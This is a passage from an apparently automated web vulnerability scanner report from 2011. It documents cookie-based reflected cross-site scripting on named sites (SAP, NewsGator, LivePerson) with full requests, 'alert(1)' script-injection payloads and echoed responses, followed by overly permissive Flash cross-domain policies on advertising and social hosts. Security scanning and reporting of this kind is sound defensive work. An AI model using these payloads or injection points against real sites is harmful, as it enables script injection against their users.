Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:31 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:31 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3d37f8e%252522%25253e%25253cscript%25253ealert%2525281%252529%25253c%25252fscript%25253ed84849f1e63; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:26:31 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:31 GMT
Content-Length: 87686


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="/search?hl=en&q=37f8e"><script>alert(1)</script>d84849f1e63" onmouseover="window.status='Cancel';return true;" onmouseout="window.status='';return true;">
...[SNIP]...

3.137. http://info.newsgator.com/Trial_SocialSites2010.html [_mkto_trk cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.newsgator.com
Path:   /Trial_SocialSites2010.html

Issue detail

The value of the _mkto_trk cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c85bc"><script>alert(1)</script>8f8092d2a75 was submitted in the _mkto_trk cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Trial_SocialSites2010.html?Leadsource=trial HTTP/1.1
Host: info.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/Default.aspx?tabid=214
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028c85bc"><script>alert(1)</script>8f8092d2a75; __utma=1.930474175.1318692366.1318692366.1318692366.1; __utmb=1.2.10.1318692366; __utmc=1; __utmz=1.1318692366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Date: Sat, 15 Oct 2011 15:29:19 GMT
Server: Apache
Vary: *,Accept-Encoding
Content-Length: 58979
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la
...[SNIP]...
<input type="hidden" name="_mkt_trk" value="id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028c85bc"><script>alert(1)</script>8f8092d2a75" />
...[SNIP]...

3.138. http://sales.liveperson.net/hc/37021986/ [HumanClickKEY cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The value of the HumanClickKEY cookie is copied into the HTML document as plain text between tags. The payload 322fe<script>alert(1)</script>66c84936f43 was submitted in the HumanClickKEY cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hc/37021986/?&site=37021986&cmd=mTagKnockPage&lpCallId=829444102476-367235385580&protV=20&lpjson=1&id=3194230441&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-sapphire-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3723022180028337440322fe<script>alert(1)</script>66c84936f43; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDSABCBTCA=JPCIGIDCLHAIHDGJNIENHOAB

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:26:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=3723022180028337440322fe<script>alert(1)</script>66c84936f43; path=/hc/37021986
Set-Cookie: HumanClickKEY=3723022180028337440322fe<script>alert(1)</script>66c84936f43; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 14:26:49 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31949

lpConnLib.Process({"ResultSet": {"lpCallId":"829444102476-367235385580","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
{"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='37021986-VID'; lpMTagConfig.FPC_VID='546022977410'; lpMTagConfig.FPC_SKEY_NAME='37021986-SKEY'; lpMTagConfig.FPC_SKEY='3723022180028337440322fe<script>alert(1)</script>66c84936f43';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_37021986'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...

3.139. https://www.sap.com/host.epx [pmelayerurl cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /host.epx

Issue detail

The value of the pmelayerurl cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49b75"%3balert(1)//cd3cd8afedf was submitted in the pmelayerurl cookie. This input was echoed as 49b75";alert(1)//cd3cd8afedf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /host.epx?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-US10-SGE-FRBUSOPT; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; OriginatingURL=http://www.sapbusinessoptimizer.com/; SingleSignOnURL=51a3d747-8c02-417d-8f96-ae6e0ddd405d||||http://www.sapbusinessoptimizer.com/|; pmeoriginalurl=%2fhost.epx; pmereturnurl=%2fgwtservice.epx; pmelayerurl=%2fprofile%2flogin.epx%3fCCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220%26pmelayer%3dtrue49b75"%3balert(1)//cd3cd8afedf; pmedialogmode=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:31:49 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:31:49 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:31:49 GMT; path=/
Set-Cookie: pmelayerurl=; domain=.sap.com; path=/
Set-Cookie: pmedialogmode=; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:31:49 GMT
Content-Length: 32924


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
ext/javascript">
$(document).ready(function()
{
openWindowLayer("/profile/login.epx?CCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220&pmelayer=true49b75";alert(1)//cd3cd8afedf");
}
);</script>
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 15 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 15 Oct 2011 12:05:08 GMT
Expires: Sun, 16 Oct 2011 12:05:08 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 8387

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.2. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sat, 02-Oct-2021 13:47:02 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.3. http://leads.demandbase.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://leads.demandbase.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: leads.demandbase.com

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:19:09 GMT
Server: Apache
Last-Modified: Wed, 10 Aug 2011 06:02:39 GMT
ETag: "9064-c9-4aa206d767dc0"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.4. http://omnituremarketing.d1.sc.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.d1.sc.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omnituremarketing.d1.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 13:47:21 GMT
Server: Omniture DC/2.0.0
xserver: www337
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.5. http://omnituremarketing.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omnituremarketing.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sat, 15 Oct 2011 13:47:03 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.6. http://omniturestaging.staging.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omniturestaging.staging.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sat, 15 Oct 2011 13:47:09 GMT
Accept-Ranges: bytes
ETag: W/"201-1318276878000"
Connection: close
Last-Modified: Mon, 10 Oct 2011 20:01:18 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

4.7. http://pixel.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xc91 3217
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.8. http://sap.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sap.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sap.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:24:58 GMT
Server: Omniture DC/2.0.0
xserver: www363
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.9. http://static.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 15 Oct 2011 11:49:04 GMT
Expires: Sat, 15 Oct 2011 11:25:04 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 9351
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.10. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 15 Sep 2011 22:33:08 GMT
Date: Sat, 15 Oct 2011 07:13:32 GMT
Expires: Sun, 16 Oct 2011 07:13:32 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 25882
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.11. http://www.connect.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.connect.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.33.29.104
Connection: close
Content-Length: 1590

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
   <allow-access-from domain="www.phunt.dev2439.facebook.com" />
...[SNIP]...

4.12. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.156.45
Connection: close
Content-Length: 1590

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
